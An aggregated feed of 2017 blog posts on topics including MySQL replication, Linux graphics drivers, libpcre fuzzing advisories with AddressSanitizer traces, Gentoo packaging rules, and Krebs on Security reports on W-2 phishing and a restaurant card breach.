[L]arge predators both reflect and safeguard the health of coral reefs. If they’re fished out, the rippling consequences can be devastating, leading to fewer fish and sicklier corals. And since those changes happened decades ago, they’ve influenced our perceptions of what coral reefs should look like. We think of the kaleidoscopic realms of Pixar movies or aquarium tanks, but those are reefs that have already been badly depleted. Pristine ones are worlds where predators abound, and colorful prey cower within the coral. “It’s like the difference between the English countryside and the African Serengeti,” […]

Top

New Arrival: How to Kill a City

Postby kris via The Isoblog. »

How to kill a city
Peter Moskowitz has written a book on “Gentrification, Inequality, and the Fight for the Neighborhood”, titled “How to Kill a City”. It’s available on Kindle for some 11 Euro.

There is a matching article in The Atlantic, The Steady Destruction of America’s Cities. Based on observations in Detroit, San Francisco, New York and Post-Katrina New Orleans, he tries to explain the process of Gentrification and distinguish it from urban renewal or other forms of change that are frequent in cities.

While urban renewal, the suburbanization of cities, and other forms of capital creation are relatively easy to spot (a highway built through a neighborhood is a relatively obvious event), gentrification is more discreet, dispersed, and hands-off,” he writes. Moskowitz adds to the growing canon aimed at understanding and explaining the process of gentrification, and he not so subtly suggests that while gentrification  naturally brings some improvements to a city,including more people and money, it also frequently kills some cultural traditions and diversity, the precise characteristics that make cities so dynamic and desirable in the first place.

Top

Ubuntu 12.04 LTS expires next month, but there’s the Dodo club

Postby kris via The Isoblog. »

So Precise Pangolin was published as Ubuntu 12.04 LTS on April 26, 2012.

That’s a long time ago. Back then, Battleship, The Avengers (3D) and Cabin In The Woods (3D) were released. Intel released the Ivy Bridge Microarchitecture. The last proper US president campaigned for his second term and the US weren’t a failed state back then. It was a different world.



Since then, Ubuntu has seen the 12.10, 13.04, 13.10, 14.04 LTS, 14.10, 15.04, 15.10, 16.04 LTS and 16.04 releases, and the 17.04 release is due RSN. That’s 10 Ubuntu releases and two of them are LTS.

You should have upgraded since then. Twice. At least. If you haven’t:

You suck.
Your Devops is weak.
And you should feel bad.

Anyway: Support for 12.04 ends in a month.

If you want to join the Dodo club, though, together with the worlds remaining XP users, you can pay. Because there is the Ubuntu 12.04 Extended Security Maintenance subscription. It’s Ubuntu 12.04, and it’s extended and it’s probably maintenance, but it certainly has nothing to do with “security”. That would mean upgrading.
Top

Galera vs. Group Replication

Postby kris via The Isoblog. »

Percona: Galera ./. Group Replication
A blog post over at Percona discusses better replication for MySQL and compares Galera and MySQL Group Replication.

Galera builds their own initial state transfer mechanism and their own transaction distribution mechanism, independently of MySQL replication (write set replication wsrep). wsrep is synchronous – on commit, the write set is shipped, applied and acknowledged (or not).

MySQL Group Replication strives to achive the same thing, but uses their own, “MySQL native” set of technologies to do this.

The Galera cluster accepts writes to multiple cluster nodes concurrently, and will apply them successfully as long as the primary keys in the write sets (transactions) concurrently being applied within the cluster do not overlap. If there are collisions, they will make one of the colliding write sets fail, and cause a rollback of the transaction.

Galera does not propagate locks, though, only writes. Which means that it can not isolate properly, by construction, and that transactions of the form

BEGIN
SELECT id FROM t WHERE id = ? FOR UPDATE
UPDATE t SET d = ? where id = ?
COMMIT
can’t work, because the X-Lock set by the SELECT FOR UPDATE statement goes nowhere in the cluster.

Most users of Galera do not, by default, write to multiple nodes, but a single cluster node. There may be concurrent updates during a failover situation. This use of Galera avoids many of the problems with missing lock propagation, and the concurrency issues that could come from frequently overlapping write sets on multiple masters.

MySQL Group Replication is constructed quite similarly, and has similar deployment properties, even if the implementation is independent and different.

If you are using either Galera or MySQL Group Replication as a mechanism to migrate from a single Master as a SPOF to a more resilient setup, this may work, but has it’s own issues during failover, and in normal operation, too. Especially if there are transactions with a more complicated lock structure and concurrent distributed writes involved – both products will fail reliably in such a scenario, so you need to validate the workload to be matching the capabilties of the cluster chosen.
Top

Some basics about distributed databases

Postby kris via The Isoblog. »

This is a replay of a much older blog post, which was available in German language in the old blog. It’s from 2012, and neither GTID nor Galera cluster or Group Replication existed back then.

Wonka> The http://www.toppoint.de probably will never have meaningful load, but I would like to know how one would make this highly available. Some kind of Redundant Array of Inexpensive Databases.

Lalufu> MySQL with replication? Or DRBD?

Isotopp> With DRBD. Not with replication.



Wonka> Lalufu: Hm, Master-Master replication is with two hosts. If you want more than that you could build rings, but only singularly linked.

Isotopp> Wonka: Argh! Master-Master does not work with replication, ever.

Wonka> huh?

Isotopp> Thread 1 writes to Master 1:

insert into t (id, d) values (NULL, 'one');
At the same time, Thread 2 writes to Master 2:

insert into t (id, d) values (NULL, 'two');
Isotopp> What’s the content of the database master1, what’s the content of database master2? If you assume auto_increment_increment and auto_increment_offset to be configured correctly?

Wonka> Isotopp: Ok, Problem. Still, there are many HOWTOs about that.

Isotopp> Wonka: Not a problem, yet. You will have (1, ‘one’) and (2, ‘two). So far it works.

kv_> After UPDATE things will look worse.

Isotopp> Now Thread 1 runs an UPDATE against Master 1.

update t set d = 'een' where id = 1;
And Thread 2 does an UPDATE against Master 2:

update t set d = 'eins' where id = 1;
Isotopp> What’s the content of Master 1 and Master 2 now? The point being that there is no global timeline for the entire ring, so there is no one global serialization of the rings history. Instead each local node has it’s own local order of events. That means on Master 1 you can have an order of events one, een, eins and on master 2 it can be one, eins, een.

Lalufu> Actually the problem is that people would like to have such a global order, but MySQL can’t deliver that.

Isotopp> It’s even more complicated. Let me explain to the end.

Wonka> http://www.howtoforge.com/mysql_master_master_replication “This tutorial describes how to set up MySQL master-master replication. We need to replicate MySQL servers to achieve high-availability (HA). In my case I need two masters that are synchronized with each other so that if one of them drops down, other could take over and no data is lost. Similarly when the first one goes up again, it will still be used as slave for the live one.”

Wonka> So they did not understand this.

Isotopp> Exactly. They think they can win, but you cannot cheat the universe. So you want to enforce such a serialisation. In SQL you enforce an ordering of events with locks on the domain you want to enforce an order on. That means you need a locking that works on the entire domain, all servers in that.

Because your domain is no longer a single box. For a single box you do have local locking. But now you have that cluster, or a ring. And MySQL replication specifically has no locking protocol. Such locking protocols do exist, 2PC, 3PC, Paxos, and a few more. 2PC is the ‘fastest’ in the sense that it uses a minimal number of round trips in the case of no special events happening during the lock synchronisation in the cluster. Paxos is the best with respect to recoverability.

Without a locking protocol you can’t do concurrent writes safely, because you do not create a globally identical serialisation of events. Any setup with more than one writer without a distributed locking protocol is broken.

Now we read the instructions for mmm, MySQL Multi Master. They say: Writes all need to go to one single node. So, Ring, but not actually Multi Master – the name is fake.

Looking elsewhere, does not matter where: EITHER synchronisation by locks, OR one master/write node OR broken.

These are all available choices. There are no others.

kv_> Wonka: And if you ask people why they are using Master-Master or circular replication, they answer is always the wrong one. “High Availability” or “Load Balancing”. For high availability, take shared storage and an operating system level shared storage, NetApp or DRBD. And for load balancing take one way replication. Write Distribution MySQL does not do. People who need this will do application level sharding.

Isotopp> Precisely.

And now coming back to MySQL and delivering: There is a product from MySQL with multiple nodes and 2PC. It’s called MySQL cl-uster. It does not use MySQL replication to achieve this.

And wrt to HA: MySQL 5.1, 5.5 and 5.6 have different increments of Semi Syncronous Replication (SSR). You can have one master, but multiple slaves, which will delay the commit on the master until there is at least one slave that has the same data as the master. That combines the disadvantages of 2PC (slower) with the disadvantages of replication, as they are:

In MySQL replication each slave is dependent on the binlog position, which each slave has locally. That means, you can’t simply move Slave 3 from Master 1 to Slave 2, even if Slave 2 is known to be at the same position as Master 1 thanks to SSR.

That’s because the binlog position of Master 1 is expressed as (mname, mpos), but the same position on Slave 2 would be (s2name, s2pos). You would need a translation mechanism for each of those in order to change between them.

Beginning with MySQL 5.6 you get Global Transaction ID (GTID), which is such a translation mechanism. With SSR and GTID together you can finally use replication as a HA mechanism and could build a stable ring with exactly one active master. You still have a bit of waits because of SSR, but failover is smooth.

You still have no simple way of doing proper multi-master, because MySQL Cluster is not a good replacement for vanilla MySQL as being used by vanilla MySQL applications.

Top

Tumblr of the Day: Berlin Typography

Postby kris via The Isoblog. »

Tumblr of the Day is a WordPress: Berlin Typography takes photos of shop signs or other urban lettering and discusses that.

Check out their post about “The Typography of Hair Salons“.

The Typography of Hair Salons
Top

This week in vc4 2017-03-20: HDMI Audio, ARM CLCD, glamor

Postby Eric Anholt via anholt's lj »

The biggest news this week is that I've landed the VC4 HDMI audio driver from Boris in drm-misc-next.  The alsa-lib maintainers took the patch today for the automatic configuration file, so now we just need to get that backported to various distributions and we'll have native HDMI audio in 4.12.

My main project, though, was cleaning up the old ARM CLCD controller driver.  I've cut the driver from 3500 lines of code to 1000, and successfully tested it with VC4 doing dmabuf sharing to it.  It was surprising how easy the dmabuf part actually was, once I had display working.

Still to do for display on this platform is to get CLCD merged, get my kmscube patches merged (letting you do kmscube on a separate display vs gpu platform), and clean up my xserver patches.  The xserver changes are to let you have a 3D GPU with no display connectors as the protocol screen and the display controller as its sink.  We had infrastructure for most of this for doing PRIME in laptops, except that laptop GPUs all have some display connectors, even if they're not actually connected to anything.

I also had a little time to look into glamor bugs.  I found a little one-liner to fix dashed lines (think selection rectangles in the GIMP), and debugged a report of how zero-width lines are broken.  I'm afraid for VC4 we're going to need to disable X's zero-width line acceleration.  VC4 hardware doesn't implement the diamond-exit rule, and actually has some workarounds in it for the way people naively *try* to draw lines in GL that thoroughly breaks X11.

In non-vc4 news, the SDHOST driver is now merged upstream, so it should be in 4.12.  It won't quite be enabled in 4.12, due to the absurd merge policies of the arm-soc world, but at least the Fedora and Debian kernel maintainers should have a much easier time with Pi3 support at that point.
Top


The next bond film…

Postby kris via The Isoblog. »

My WhatsApp said:



The next Bond is with Gillian Anderson as Bond. And she’s got to neutralize the misogynistic US president, who deserted to the Russians.

HHOS.
Top

libpcre: invalid memory read in _pcre32_xclass (pcre_xclass.c)

Postby ago via agostino's blog »

Description:
libpcre is a perl-compatible regular expression library.

A fuzz on libpcre1 through the pcretest utility revealed an invalid memory read. Upstream says that this bug is fixed by one of the previous commit. However I’m providing as usual the stacktrace and the reproducer, so if you are not running the latest upstream release, like happen on debian/rhel based distros, you may want to check better the status of this bug.

The complete ASan output:

# pcretest -32 -d $FILE
==27914==ERROR: AddressSanitizer: SEGV on unknown address 0x7f3f580efe04 (pc 0x7f3f577b8048 bp 0x7ffcb035b390 sp 0x7ffcb035b320 T0)
==27914==The signal is caused by a READ memory access.
    #0 0x7f3f577b8047 in _pcre32_xclass /tmp/portage/dev-libs/libpcre-8.40/work/pcre-8.40/pcre_xclass.c:135:30
    #1 0x7f3f576137ca in match /tmp/portage/dev-libs/libpcre-8.40/work/pcre-8.40/pcre_exec.c:3203:16
    #2 0x7f3f575e7226 in pcre32_exec /tmp/portage/dev-libs/libpcre-8.40/work/pcre-8.40/pcre_exec.c:6936:8
    #3 0x527d6c in main /tmp/portage/dev-libs/libpcre-8.40/work/pcre-8.40/pcretest.c:5218:9
    #4 0x7f3f565b478f in __libc_start_main /tmp/portage/sys-libs/glibc-2.23-r3/work/glibc-2.23/csu/../csu/libc-start.c:289
    #5 0x41b438 in _init (/usr/bin/pcretest+0x41b438)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /tmp/portage/dev-libs/libpcre-8.40/work/pcre-8.40/pcre_xclass.c:135:30 in _pcre32_xclass
==27914==ABORTING
Affected version:
8.40

Fixed version:
8.41 (not released atm)

Commit fix:
N/A

Credit:
This bug was discovered by Agostino Sarubbo of Gentoo.

CVE:
CVE-2017-7244

Reproducer:
https://github.com/asarubbo/poc/blob/master/00206-pcre-invalidread-_pcre32_xclass

Timeline:
2017-02-24: bug discovered and reported to upstream
2017-03-20: blog post about the issue
2017-03-23: CVE assigned

Note:
This bug was found with American Fuzzy Lop.

Permalink:

libpcre: invalid memory read in _pcre32_xclass (pcre_xclass.c)

Top

libpcre: heap-based buffer overflow in regexflip8_or_16 (pcretest.c)

Postby ago via agostino's blog »

Description:
libpcre is a perl-compatible regular expression library.

A fuzz on libpcre1 through the pcretest utility revealed an heap overflow in the utility itself. Will follow a feedback from upstream.

I am not going to do anything about this one. (a) It is concerned with a feature of pcretest that has been dropped from pcre2test, and (b) the input contains binary zeros, which are not supported in pcretest input. This is documented for pcre2test but not, I see for pcretest. I have added a paragraph to the documentation.

However, it does not cost much for me inform the community that this bug exists.
In any case, if you have a web application that calls directly the pcretest utility to parse untrusted data, then you are affected.
Also, it is important share the details because some distros/packagers may want to patch this issue instead of follow the upstream’s way.

The complete ASan output:

# pcretest -16 -d $FILE
==30352==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60b00000b000 at pc 0x00000053cef0 bp 0x7ffd02dccb90 sp 0x7ffd02dccb88
READ of size 2 at 0x60b00000b000 thread T0
    #0 0x53ceef in regexflip8_or_16 /tmp/portage/dev-libs/libpcre-8.40/work/pcre-8.40/pcretest.c:2552:24
    #1 0x53ceef in regexflip /tmp/portage/dev-libs/libpcre-8.40/work/pcre-8.40/pcretest.c:2792
    #2 0x53ceef in main /tmp/portage/dev-libs/libpcre-8.40/work/pcre-8.40/pcretest.c:4425
    #3 0x7fb6693d678f in __libc_start_main /tmp/portage/sys-libs/glibc-2.23-r3/work/glibc-2.23/csu/../csu/libc-start.c:289
    #4 0x41b438 in _init (/usr/bin/pcretest+0x41b438)

0x60b00000b000 is located 0 bytes to the right of 112-byte region [0x60b00000af90,0x60b00000b000)
allocated by thread T0 here:
    #0 0x4d41f8 in malloc /tmp/portage/sys-devel/llvm-3.9.1-r1/work/llvm-3.9.1.src/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64
    #1 0x53e883 in new_malloc /tmp/portage/dev-libs/libpcre-8.40/work/pcre-8.40/pcretest.c:2372:15
    #2 0x7fb66a9473a1 in pcre16_compile2 /tmp/portage/dev-libs/libpcre-8.40/work/pcre-8.40/pcre_compile.c:9393:19
    #3 0x5335d9 in main /tmp/portage/dev-libs/libpcre-8.40/work/pcre-8.40/pcretest.c:4034:5
    #4 0x7fb6693d678f in __libc_start_main /tmp/portage/sys-libs/glibc-2.23-r3/work/glibc-2.23/csu/../csu/libc-start.c:289

SUMMARY: AddressSanitizer: heap-buffer-overflow /tmp/portage/dev-libs/libpcre-8.40/work/pcre-8.40/pcretest.c:2552:24 in regexflip8_or_16
Affected version:
8.40

Commit fix:
N/A

Fixed version:
N/A

Credit:
This bug was discovered by Agostino Sarubbo of Gentoo.

Reproducer:
https://github.com/asarubbo/poc/blob/master/00196-pcre-heapoverflow-regexflip8_or_16

Timeline:
2017-02-22: bug discovered and reported to upstream
2017-03-20: blog post about the issue

Note:
This bug was found with American Fuzzy Lop.

Permalink:

libpcre: heap-based bufffer overflow in regexflip8_or_16 (pcretest.c)

Top

libpcre: two stack-based buffer overflow write in pcre32_copy_substring (pcre_get.c)

Postby ago via agostino's blog »

Description:
libpcre is a perl-compatible regular expression library.

A fuzz on libpcre1 through the pcretest utility revealed two stack overflow write. Upstream says that these bugs are fixed by one of the previous commit. However I’m providing as usual the stacktrace and the reproducer, so if you are not running the latest upstream release, like happen on debian/rhel based distros, you may want to check better the status of this bug.

The complete ASan output:

# pcretest -32 -d $FILE
==29686==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7f58f32026a0 at pc 0x7f58f6f90a24 bp 0x7ffea3aa3b30 sp 0x7ffea3aa3b28
WRITE of size 4 at 0x7f58f32026a0 thread T0
    #0 0x7f58f6f90a23 in pcre32_copy_substring /tmp/portage/dev-libs/libpcre-8.40/work/pcre-8.40/pcre_get.c:358:15
    #1 0x528220 in main /tmp/portage/dev-libs/libpcre-8.40/work/pcre-8.40/pcretest.c:5333:13
    #2 0x7f58f5ea778f in __libc_start_main /tmp/portage/sys-libs/glibc-2.23-r3/work/glibc-2.23/csu/../csu/libc-start.c:289
    #3 0x41b438 in _init (/usr/bin/pcretest+0x41b438)
Reproducer:
https://github.com/asarubbo/poc/blob/master/00207-pcre-stackoverflow-pcre32_copy_substring
CVE:
CVE-2017-7245

# pcretest -32 -d $FILE
==21399==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7f83734026a0 at pc 0x0000004bd2ac bp 0x7ffdda673b30 sp 0x7ffdda6732e0
WRITE of size 268 at 0x7f83734026a0 thread T0
    #0 0x4bd2ab in __asan_memcpy /tmp/portage/sys-devel/llvm-3.9.1-r1/work/llvm-3.9.1.src/projects/compiler-rt/lib/asan/asan_interceptors.cc:413
    #1 0x7f8377118925 in pcre32_copy_substring /tmp/portage/dev-libs/libpcre-8.40/work/pcre-8.40/pcre_get.c:357:1
    #2 0x528220 in main /tmp/portage/dev-libs/libpcre-8.40/work/pcre-8.40/pcretest.c:5333:13
    #3 0x7f837602f78f in __libc_start_main /tmp/portage/sys-libs/glibc-2.23-r3/work/glibc-2.23/csu/../csu/libc-start.c:289
    #4 0x41b438 in _init (/usr/bin/pcretest+0x41b438)
Reproducer:
https://github.com/asarubbo/poc/blob/master/00209-pcre-stackoverflow2-read_capture_name32
CVE:
CVE-2017-7246

Affected version:
8.40

Fixed version:
8.41 (not released atm)

Commit fix:
N/A

Credit:
This bug was discovered by Agostino Sarubbo of Gentoo.

Timeline:
2017-02-24: bug discovered and reported to upstream
2017-03-20: blog post about the issue

Note:
This bug was found with American Fuzzy Lop.

Permalink:

libpcre: two stack-based buffer overflow write in pcre32_copy_substring (pcre_get.c)

Top

Mac mini G4 vs Raspi 3

Postby kris via The Isoblog. »

The Original Mac Mini G4 had a single-core 32-Bit PowerPC CPU at some 1.25 GHz with 512 KB on-chip Cache. It was released in 2005.

It has a Geekbench Score of 766.

 

Raspi 3 by User:Evan-Amos
The Raspberry Pi basically is a a cellphone, without the battery and the packaging. The Raspberry Pi 3 was released in 2016, and has a BCM 2837 with a quadcore ARM with 1.2 GHz.

It has a Geekbench Score of 2128.

In case you need to illustrate how Moore’s Law works, in a practical, touchable way.
Top

Pulse of Europe

Postby kris via The Isoblog. »

Pulse Of Europe


We are convinced that the majority of people believe in the fundamental idea of the European Union. We all must now send out positive energy against current tendencies. The European pulse must be felt everywhere!

We have a big goal: to gather as many people as possible in Europe, who stand for Europe, and are able to support pro- European forces after the elections. Thus we can form a human chain all across Europe connecting Germany, France and the Netherlands.

We are meeting every Sunday in several European cities: Frankfurt, Paris, Amsterdam, Köln, Freiburg, etc. Check out the language versions of this website for a full list.

The Amsterdam Group meets every Sunday, 14:00 on the lawn behind the Rijksmuseum.
Top

When the ice melts, what does that look like?

Postby kris via The Isoblog. »

Drum-Heller-Channels by User:Woofles
National Geographic’s Glenn Hodges explains the Channeled Scablands of Washington State, with some quite awesome photos by Michael Melford.

In the middle of eastern Washington, in a desert that gets less than eight inches of rain a year, stands what was once the largest waterfall in the world. It is three miles wide and 400 feet high—ten times the size of Niagara Falls—with plunge pools at its base suggesting the erosive power of an immense flow of water.





Top

Before Code, there was the Codex

Postby kris via The Isoblog. »

Nautilus has an article by Philip Auerswald, Author of The Code Economy: A Forty-Thousand-Year History. Auerswald tries to tie our current practice of crystallising rules in Code back to the Codexes and Recipes of older times, and sees our civilisation as a system of dealing with complexity by packaging and encapsulating it. According to Auerswald, running Code on machines is new, previously we have been running it on humans:

“Code” as I intend it incorporates elements of computer code, genetic code, cryptologic code, and other forms as well. But, as I describe in my book The Code Economy: A Forty-Thousand Year History, published this year, it also stands as its own concept—the algorithms that guide production in the economy—for which no adequate word yet exists. Code can include instructions we follow consciously and purposively, and those we follow unconsciously and intuitively.

Top

When you commit to git, how long does it matter?

Postby kris via The Isoblog. »

Commit to git
Erik Bernhardsson has been running Big Data on Git repositories of various kinds.

He was trying to find out what the half-life of code is. That is, when you commit to a repository, your code becomes part of a project, but eventually other code will replace it and it will no longer be part of the current version. How stable is the codebase, what is the half-life of code? And why is it different in different projects?

As a project evolves, does the new code just add on top of the old code? Or does it replace the old code slowly over time? In order to understand this, I built a little thing to analyze Git projects, with help from the formidable GitPython project. The idea is to go back in history historical and run a git blame […]

Top

Magic circles banning autonomous cars

Postby kris via The Isoblog. »

Trapping Autonomous Cars
Somebody sent me a link to Vice withe the comment “A multiple hit in the Venn Diagram of your interests”.

It’s about an artist using technology disguised as ritual magic to trap self-driving cars (and similar shenanigans). The assessent was correct, this is beautiful.

The image from the article shown above shows a self-driving car inside fake street markings. The broken lines allow the cars logic to enter the circle, the unbroken linkes mark a demarcation that must not be crossed, hence the car can never leave.

It ties back to a story my driving instructor told me. He was making a point about “How things are being presented matters”, relating about a beginners driver who had been told to imagine unbroken lines as a “wall that cannot be crossed” and who because of that had problems – sometimes rules must be broken to preserve their meaning and spirit.

Top

Govt. Cybersecurity Contractor Hit in W-2 Phishing Scam

Postby BrianKrebs via Krebs on Security »

Just a friendly reminder that phishing scams which spoof the boss and request W-2 tax data on employees are intensifying as tax time nears. The latest victim shows that even cybersecurity experts can fall prey to these increasingly sophisticated attacks.

On Thursday, March 16, the CEO of Defense Point Security, LLC — a Virginia company that bills itself as “the choice provider of cyber security services to the federal government” — told all employees that their W-2 tax data was handed directly to fraudsters after someone inside the company got caught in a phisher’s net.

Alexandria, Va.-based Defense Point Security (recently acquired by management consulting giant Accenture) informed current and former employees this week via email that all of the data from their annual W-2 tax forms — including name, Social Security Number, address, compensation, tax withholding amounts — were snared by a targeted spear phishing email.

“I want to alert you that a Defense Point Security (DPS) team member was the victim of a targeted spear phishing email that resulted in the external release of IRS W-2 Forms for individuals who DPS employed in 2016,” Defense Point CEO George McKenzie wrote in the email alert to employees. “Unfortunately, your W-2 was among those released outside of DPS.”

W-2 scams start with spear phishing emails usually directed at finance and HR personnel. The scam emails will spoof a request from the organization’s CEO (or someone similarly high up in the organization) and request all employee W-2 forms.

Defense Point did not return calls or emails seeking comment. An Accenture spokesperson issued the following brief statement:  “Data protection and our employees are top priorities. Our leadership and security team are providing support to all impacted employees.”

The email that went out to Defense Point employees Thursday does not detail when this incident occurred, to whom the information was sent, or how many employees were impacted. But a review of information about the company on LinkedIn suggests the breach letter likely was sent to around 200 to 300 employees nationwide (if we count past employees also).

Among Defense Point’s more sensitive projects is the U.S. Immigration and Customs Enforcement (ICE) Security Operations Center (SOC) based out of Phoenix, Ariz. That SOC handles cyber incident response, vulnerability mitigation, incident handling and cybersecurity policy enforcement for the agency.

Fraudsters who perpetrate tax refund fraud prize W-2 information because it contains virtually all of the data one would need to fraudulently file someone’s taxes and request a large refund in their name. Scammers in tax years past also have massively phished online payroll management account credentials used by corporate HR professionals. This year, they are going after people who run tax preparation firms, and W-2’s are now being openly sold in underground cybercrime stores.

Tax refund fraud affects hundreds of thousands, if not millions, of U.S. citizens annually. Victims usually first learn of the crime after having their returns rejected because scammers beat them to it. Even those who are not required to file a return can be victims of refund fraud, as can those who are not actually due a refund from the IRS.

ANALYSIS

I find it interesting that a company which obviously handles extremely sensitive data on a regular basis and one that manages a highly politicized government agency would not anticipate such attacks and deploy some kind of data-loss prevention (DLP) technology to stop sensitive information from leaving their networks.

Thanks to their mandate as an agency, ICE is likely a high risk target for hacktivists and nation-state hackers. This was not a breach in which data was exfiltrated through stealthy means; the tax data was sent by an employee openly through email. This suggests that either there were no DLP technical controls active in their email environment, or they were inadequately configured to prevent information in SSN format from leaving the network.

This incident also suggests that perhaps Defense Point does not train their employees adequately in information security, and yet they are trusted to maintain the security environment for a major government agency. This from a company that sells cybersecurity education and training as a service to others.

DON’T BE THE NEXT VICTIM

While there isn’t a great deal you can do to stop someone at your employer from falling for one of these W-2 phishing scams, here are some steps you can take to make it less likely that you will be the next victim of tax refund fraud:

-File before the fraudsters do it for you – Your primary defense against becoming the next victim is to file your taxes at the state and federal level as quickly as possible. Remember, it doesn’t matter whether or not the IRS owes you money: Thieves can still try to impersonate you and claim that they do, leaving you to sort out the mess with the IRS later.

-Get on a schedule to request a free copy of your credit report. By law, consumers are entitled to a free copy of their report from each of the major bureaus once a year. Put it on your calendar to request a copy of your file every three to four months, each time from a different credit bureau. Dispute any unauthorized or suspicious activity. This is where credit monitoring services are useful: Part of their service is to help you sort this out with the credit bureaus, so if you’re signed up for credit monitoring make them do the hard work for you.

-File form 14039 and request an IP PIN from the government. This form requires consumers to state they believe they’re likely to be victims of identity fraud. Even if thieves haven’t tried to file your taxes for you yet, virtually all Americans have been touched by incidents that could lead to ID theft — even if we just look at breaches announced in the past year alone.

Consider placing a “security freeze” on one’s credit files with the major credit bureaus. See this tutorial about why a security freeze — also known as a “credit freeze,” may be more effective than credit monitoring in blocking ID thieves from assuming your identity to open up new lines of credit. While it’s true that having a security freeze on your credit file won’t stop thieves from committing tax refund fraud in your name, it would stop them from fraudulently obtaining your IP PIN.

Monitor, then freeze. Take advantage of any free credit monitoring available to you, and then freeze your credit file with the four major bureaus. Instructions for doing that are here.
Top

Why you can’t rely on repository format (PMS)

Postby Michał Górny via Michał Górny »

You should know already that you are not supposed to rely on Portage internals in ebuilds — all variables, functions and helpers that are not defined by the PMS. You probably know that you are not supposed to touch various configuration files, vdb and other Portage files as well. What most people don’t seem to understand, you are not supposed to make any assumptions about the ebuild repository either. In this post, I will expand on this and try to explain why.



What PMS specifies, what you can rely on

I think the first confusing point is that PMS actually defines the repository format pretty thoroughly. However, it does not specify that you can rely on that format being visible from within ebuild environment. It just defines a few interfaces that you can reliably use, some of them in fact quite consistent with the repository layout.

You should really look as the PMS-defined repository format as an input specification. This is the format that the developers are supposed to use when writing ebuilds, and that all basic tools are supposed to support. However, it does not prevent the package managers from defining and using other package formats, as long as they provide the environment compliant with the PMS.

In fact, this is how binary packages are implemented in Gentoo. The PMS does not define any specific format for them. It only defines a few basic rules and facilities, and both Portage and Paludis implement their own binary package formats. The package managers expose APIs required by the PMS, and can use them to run the necessary pkg_* phases.

However, the problem is not limited to two currently used binary package formats. This is a generic goal of being able to define any new package format in the future, and make it work out of the box with existing ebuilds. Imagine just a few possibilities: more compact repository formats (i.e. not requiring hundreds of unpacked files), fetching only needed ebuild files…

Sadly, none of this can even start being implemented if developers continuosly insist to rely on specific repository layout.

The *DIR variables

Let’s get into the details and iterate over the few relevant variables here.

First of all, FILESDIR. This is the directory where ebuild support files are provided throughout src_* phases. However, there is no guarantee that this will be exactly the directory you created in the ebuild repository. The package manager just needs to provide the files in some directory, and this directory may not actually exist before the first src_* phase. This implies that the support files may not even exist at all when installing from a binary package, and may be created (copied, unpacked) later when doing a source build.

The next variable listed by the PMS is DISTDIR. While this variable is somewhat similar to the previous one, some developers are actually eager to make the opposite assumption. Once again, the package manager may provide the path to any directory that contains the downloaded files. This may be a ‘shadow’ directory containing only files for this package, or it can be any system downloads directory containing lots of other files. Once again, you can’t assume that DISTDIR will exist before src_*, and that it will exist at all (and contain necessary files) when the build is performed using a binary package.

The two remaining variables I would like to discuss are PORTDIR and ECLASSDIR. Those two are a cause of real mayhem: they are completely unsuited for a multi-repository layout modern package managers use and they enforce a particular source repository layout (they are not available outside src_* phases). They pretty much block any effort on improvement, and sadly their removal is continuously blocked by a few short-sighted developers. Nevertheless, work on removing them is in progress.

Environment saving

While we’re discussing those matters, a short note on environment saving is worth being written. By environment saving we usually mean the magic that causes the variables set in one phase function to be carried to a phase function following it, possibly over a disjoint sequence of actions (i.e. install followed by uninstall).

A common misunderstanding is to assume the Portage model of environment saving — i.e. basically dumping a whole ebuild environment including functions into a file. However, this is not sanctioned by the PMS. The rules require the package manager to save only variables, and only those that are not defined in global scope. If phase functions define functions, there is no guarantee that those functions will be preserved or restored. If phases redefine global variables, there is no guarantee that the redefinition will be preserved.

In fact, the specific wording used in the PMS allows a completely different implementation to be used. The package manager may just snapshot defined functions after processing the global scope, or even not snapshot them at all and instead re-read the ebuild (and re-inherit eclasses) every time the execution continues. In this case, any functions defined during phase function are lost.

Is there a future in this?

I hope this clears up all the misunderstandings on how to write ebuilds so that they will work reliably, both for source and binary builds. If those rules are followed, our users can finally start expecting some fun features to come. However, before that happens we need to fix the few existing violations — and for that to happen, we need a few developers to stop thinking only of their own convenience.
Top

Electric delivery truck

Postby kris via The Isoblog. »

Amsterdam: Electric delivery truck
Top

Post.nl: Electric delivery vehicle for packages

Postby kris via The Isoblog. »

Post NL: Electric delivery vehicle
Top

Google Points to Another POS Vendor Breach

Postby BrianKrebs via Krebs on Security »

For the second time in the past nine months, Google has inadvertently but nonetheless correctly helped to identify the source of a large credit card breach — by assigning a “This site may be hacked” warning beneath the search results for the Web site of a victimized merchant.

A little over a month ago, KrebsOnSecurity was contacted by multiple financial institutions whose anti-fraud teams were trying to trace the source of a great deal of fraud on cards that were all used at a handful of high-end restaurants around the country.

Two of those fraud teams shared a list of restaurants that all affected cardholders had visited recently. A bit of searching online showed that nearly all of those establishments were run by Select Restaurants Inc., a Cleveland, Ohio company that owns a number of well-known eateries nationwide, including Boston’s Top of the Hub; Parker’s Lighthouse in Long Beach, Calif.; the Rusty Scupper in Baltimore, Md.; Parkers Blue Ash Tavern in Cincinnati, Ohio; Parkers’ Restaurant & Bar in Downers Grove, Illinois; Winberie’s Restaurant & Bar with locations in Oak Park, Illinois and Princeton and Summit, New Jersey; and Black Powder Tavern in Valley Forge, PA.

Google’s search listing for Select Restaurants, which indicates Google thinks this site may be hacked.
Knowing very little about this company at the time, I ran a Google search for it and noticed that Google believes the site may be hacked (it still carries this message). This generally means some portion of the site was compromised by scammers who are trying to abuse the site’s search engine rankings to beef up the rankings for “spammy” sites — such as those peddling counterfeit prescription drugs and designer handbags.

The “This site may be hacked” advisory is not quite as dire as Google’s “This site may harm your computer” warning — the latter usually means the site is actively trying to foist malware on the visitor’s computer. But in my experience it’s never a good sign when a business that accepts credit cards has one of these warnings attached to its search engine results.

Case in point: I experienced this exact scenario last summer as I was reporting out the details on the breach at CiCi’s Pizza chain. In researching that story, all signs were pointing to a point-of-sale (POS) terminal provider called Datapoint POS. Just like it did with Select Restaurants’s site, Google reported that Datapoint’s site appeared to be hacked.

Google believed Datapoint’s Web site was hacked.
